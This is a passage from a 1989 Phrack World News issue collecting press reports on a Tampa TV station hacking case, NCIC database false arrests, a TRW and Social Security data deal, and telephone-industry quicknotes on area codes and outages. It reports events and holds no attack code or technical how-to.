Hackers have invaded Southern Bell in the past, but they have never
reprogrammed a telephone link, Passmore said.

Security technicians from Southern Bell and AT&T are trying to trace the source
of the computer breach, Passmore said.
_______________________________________________________________________________

Hacking For A Competitive Edge                                     May 12, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Taken from the Los Angeles Times

Two former Tampa, FLA TV news managers have been charged with illegally tapping
into phone lines and computers at another station to gain a news edge over
their competitors.  Former new director Terry Cole and assistant news director
Michael Shapiro at WTSP-TV have been charged with 17 counts of computer hacking
and conspiracy in the theft of information from WTVT-TV through computer phone
lines, authorities said.  Their arraignment was set for May 19.

If convicted, each could face a maximum prison sentence of 85 years.  The two
were fired from WTSP when the station learned of the alleged thefts.  The
break-ins began in November, 1988, but were not noticed until January 12, 1989,
when WTVT's morning news producer noticed that files were missing, authorities
said.

Computer experts determined that an intruder had rifled the files.  Authorities
said Shapiro knew WTVT's security system thoroughly because he had helped set
it up while working there as an assignment manager before being hired away from
WTVT in October.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

TV News Executives Fired After Hacking Charges From Rival
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Tampa, Fla. -- A Florida television station fired two news executives in the
wake of reports that one of them allegedly penetrated a rival station's
computer system and stole sensitive information.

WTSP-TV (Channel 10), an ABC affiliate in St. Petersburg, announced that it had
fired Assistant News Director Michael Shapiro and News Director Terry Cole.

Shapiro was arrested on February 7th on felony charges for allegedly breaking
into a computer system at WTVT-TV (Channel 13) on at least six occasions in
January.  He was once employed by WTVT as an assistant manager and was
responsible for administering the station's computer systems.

Law enforcement officials seized from Shapiro's home a personal computer, 200
floppy disks and an operating manual and user guide for software used at the
rival station.

He has been charged with 14 felony counts under Florida Statute 815, which
covers computer-related crimes.  Each count carries a maximum sentence sentence
of 15 years and a $10,000 fine.

Vince Barresi, WSTP's vice-president and general manager, refused to comment on
the two firings.  However, in a prepared statement, he said that he told
viewers during an 11 PM newscast last Tuesday that the station acted to "avoid
any questions about the objective way we do our business in keeping the public
informed."

Cole, who hired Shapiro last September, has not been charged by Florida law
enforcement officials.  He was fired, according to one source, because as
director of the news room operations, he is held ultimately for the actions of
news staffers.  Shapiro and Cole were unavailable for comment.

[Another story that discussed this case was "Television Editor Charged In Raid
On Rival's Files" (February 8, 1989).  It appeared in Phrack World News Issue
XXIV/Part 2. -KL]
_______________________________________________________________________________

National Crime Information Center Leads To Repeat False Arrest     May 14, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by James Rainey (Los Angeles Times)

Mix ups with the databases at the NCIC have caused Roberto Perales Hernandez to
be jailed twice in the last three years as a suspect in a 1985 Chicago
residential burglary.  The authorities confused him with another Roberto
Hernandez due to a single entry in the FBI's National Crime Information Center
computer.

The two Roberto Hernandezes are the same height, about the same weight, have
brown hair, brown eyes, tattoos on their left arms, share the same birthday,
and report Social Security numbers which differ by only one digit!

The falsely imprisoned man has filed suit charging the Hawthorne, California
Police Department, Los Angeles County, and the state of California with false
imprisonment, infliction of emotional distress, and civil rights violations
stemming from the most recent arrest last year.

He had previously received a $7,000 settlement from the county for holding him
12 days in 1986 before realizing he was the wrong man.  In the latest incident,
he was held for seven days then freed with no explanation.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Another False Incarceration                                        May 18, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~
In his testimony on May 18, 1989 to the Subcommittee on Civil and
Constitutional Rights of the Committee on the Judiciary of the U.S. House of
Representatives, relating to the National Crime Information Center, David D.
Redell cited another case of false incarceration concerning Roberto Perales
Hernandez as well as various cases noted earlier -- such as that of Terry Dean
Rogan [see below]:

     "Only last week, a case in California demonstrated the potential
     benefit of easy access to stored images.  Joseph O. Robertson had
     been arrested, extradited, charged, and sent to a state mental
     facility for 17 months.  During that entire time, mug shots and
     fingerprints were already on file showing clearly that he was the
     wrong man, but no one had taken the trouble to check them."

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
These articles show clear examples of the damage and problems caused by this
"super" database.  People like William Bayse (Federal Bureau of Investigation's
Director For Technical Services) and William Sessions (Director of the FBI)
either fail to realize this or perhaps they just do not care (as long as
something similar does not happen to them).

For those of you who are interested in looking into this further, the first
article about this NCIC database was; "'Big Brotherish' Data Base Assailed,"
(November 21, 1988).  It appeared in Phrack World News Issue XXII/Part 3.

Another incident similar to the cases mentioned above concerned Richard
Lawrence Sklar, a political science professor at the University of California
at Los Angeles.  He was mistaken by the computer for a fugitive wanted in a
real estate scam in Arizona.  Before the FBI figured out that they had the
incorrect person, Sklar, age 58, spent two days being strip searched, herded
from one holding pen to another, and handcuffed to gang members and other
violent offenders.  For more details on this case and the case concerning Terry
Dean Rogan, please refer to "FBI National Crime Information Center Data Bank,"
(February 13, 1989) which appeared in Phrack World News Issue XXIV/Part 2 (as
well as the Washington Post).
_______________________________________________________________________________

TRW and Social Security Administration                             May 12, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The credit bureau of TRW has been working with the Social Security
Administration to verify its database of 140 million names and Social Security
numbers.  In order to cover the cost, TRW is paying the Social Security
Administration $1 million, while Social Security Administration will provide a
matching $1 million.

Since the Social Security Administration is asking for a budget increase for
their computer and telecommunications systems, several legislators are outraged
by the fact they they are spending $1 million for this non-government project.
Claiming that the project is "as far away from the mission of the Social
Security Administration as anything I have ever come across," Senator David
Pryor (D-Ark) questioned the competence and credibility of Social Security
Administration Commissioner Dorcas R. Hardy and asked for an investigation by
the HHS inspector general.

In addition, several lawmakers such as Dale Bumpers (D-Ark) believe the project
to be a violation of civil liberties. Said Bumpers, "I don't like any public
institution releasing an individual's private information."  The American Law
Division of the Congressional Research Service has already concluded that the
project is a violation of the Privacy Act of 1974.

[A related article, "Verifying Social Security Numbers," (April 11, 1989)
appeared in Phrack World News Issue XXVI/Part 3 (as well as the New York Times
on the same date). -KL]
_______________________________________________________________________________

Phrack World News XXVII Quicknotes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1.  The current name assigned to the new network being created by the merger
    of BITNET and CSNET is ONENET.
-------------------------------------------------------------------------------
2.  NPA 903 Assigned to NE Texas (May 10, 1989) -- It was just announced that
    those portions of 214 outside Dallas will be changed to 903 in the Fall of
    1990.

    With 708 assigned to Chicago, 903 assigned to Texas, and 908 assigned to
    New Jersey, only 909 and 917 remain to be assigned before the format
    changes.
-------------------------------------------------------------------------------
3.  Details On New Area Code 510 (June 6, 1989) -- The press release from
    Pacific Bell, quoted in the San Francisco Chronicle, gives the phase-in
    dates for the new NPA 510.

    Inception is scheduled for October 7, 1991, with a four-month grace period
    when NPA 415 will still work for the affected numbers.  Final cutover is
    scheduled for January 27, 1992.

    NPA 510 will encompass Alameda and Contra Costa counties, which currently
    have 842,388 customers out of the current 2,005,687 customers in NPA 415.
-------------------------------------------------------------------------------
4. New Jersey Area Code To Be Split (April 27, 1989) -- The split is not
   supposed to occur until 1991.  The new NPA will be 908 and it will basically
   cover the southern "half" of the current 201 area.  The affected counties
   will be Warren, Hunterdon, Middlesex, Union, Monmouth and Ocean, and the
   southwest corner of Morris).  Counties remaining in 201 will be Sussex,
   Passaic, Bergen, Essex, Hudson, and the majority of Morris.

   New Jersey Bell will also start requiring area codes on calls into New York
   and Pennsylvania that have been considered part of New Jersey local calling
   areas.  This will apparently take effect October 2 and free up about 25
   exchanges.  Information from the Asbury Park Press.

       [This last line somewhat contradicts the first line as far as the
       dates are concerned.  More information as we get it.      -- KL.]
-------------------------------------------------------------------------------
5. New Area Codes For London (April 27, 1989) -- British Telecom has announced
   that the area code for London is to be changed on May 6th, 1990, due to the
   increased number of lines needed in the capital.

   The existing code is 01-, and the new codes to be introduced are 071- for
   the centre of the city and 081- for the suburbs.  A list was published in
   the Evening Standard, showing which exchanges will fall in which area.
-------------------------------------------------------------------------------
6.  Member Learns The Hard Way:  American Express Is Watching (May 4, 1989) --
    This article taken from the San Jose Mercury News describes how American
    Express called a member to voice their concern that he might not be able to
    pay his recent bill.  American Express was able to access his checking
    account and find that he had less than what was owed to them.  His card was
    temporarily "deactivated" after the member refused to give any financial
    information except that he would pay up the bill with cash when it came in.

    Apparently, the card application, in finer print, declares that "[American
    Express reserves] the right to access accounts to ascertain whether you are
    able to pay the balance."  After some arguments with the company, the
    member comments that "I learned a lesson:  My life is not as private as I
    thought."
-------------------------------------------------------------------------------
7.  Southwestern Bell's QuickSource (April 24, 1989) -- Southwestern Bell
    Telephone Company is running a one year trial (March 1989 89 - March 1990)
    of two information services:  QuickSource (audiotex) and Sourceline
    (videotext).  The latter requires a terminal of some type, but the former
    only requires a touch-tone phone for access.  The QuickSource number is
    323-2000, but cannot be accessed via 1+713+; SWBTCo has blocked access to
    "the Houston metro area served by SWBTCo," according to the script the
    woman reads to you when ask for help (713-865-5777; not blocked).  The help
    desk will send you a free QuickSource directory though.
-------------------------------------------------------------------------------
8.  Telemail, MCI, AT&T Mail Interconnection (May 16, 1989) -- U.S. Sprint's
    subsidiary, Telenet has announced an interconnection agreement between
    Telemail, Telenet's electronic mail product, MCI Mail, and AT&T Mail.

    The new arrangement, scheduled to be in effect later this summer, will
    allow the 300,000 worldwide users of Telemail, the 100,000 users of MCI
    Mail and the 50,000 users of AT&T Mail to conveniently send email messages
    to each other.
-------------------------------------------------------------------------------
9.  Illinois Bell Knocked Out For Four Hours! (May 18,1989) -- Service to over
    40,000 Illinois Bell subscribers in the northwest suburbs of Chicago was
    disrupted for about four hours because of problems with the computer in the
    switching center.

    Phones were either dead or inoperative for incoming and outgoing calls
    between 9:30 a.m. and 1:40 p.m. because of a software glitch at the central
    office in Hoffman Estates, IL.  Most of the disruption occurred in Hoffman
    Estates, Schaumburg, Arlington Heights, Hanover Park, and Streamwood, IL.

    The exact nature of the problem was not discussed by the Bell spokesman who
    reported that the outage had been corrected.  Apparently the backup system
    which is supposed to kick in also failed.
-------------------------------------------------------------------------------
10. SRI Attacked By Kamikaze Squirrels (May 29, 1989) -- It seems that the Data
    Defense Network SRI's "no-single-point-of-failure" power system failed at
    the hands, or rather the paws, of a squirrel.  The power was off for
    approximately 9 hours and they experienced no hardware problems.  This was
    at least the third time that a squirrel has done SRI in.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
11. New York Telephone Freebies (June 10, 1989)(San Francisco Chronicle, p. 2.)
    -- 24 pay phones along the Long Island Expressway were in fact free phones
    because of a programming/database screw-up.  They were being heavily used
    for long distance calls by those who had discovered the oversight,
    including many to Pakistan (Police found 15 Pakistani men using the phones
    when they went to investigate after a shooting).  There were no estimates
    on the unrecovered cost of the phone calls.
_______________________________________________________________________________

                     ***  END  ***



--------------------------------------------------------------------------------
 
Источник
www.exploit-db.com

Похожие темы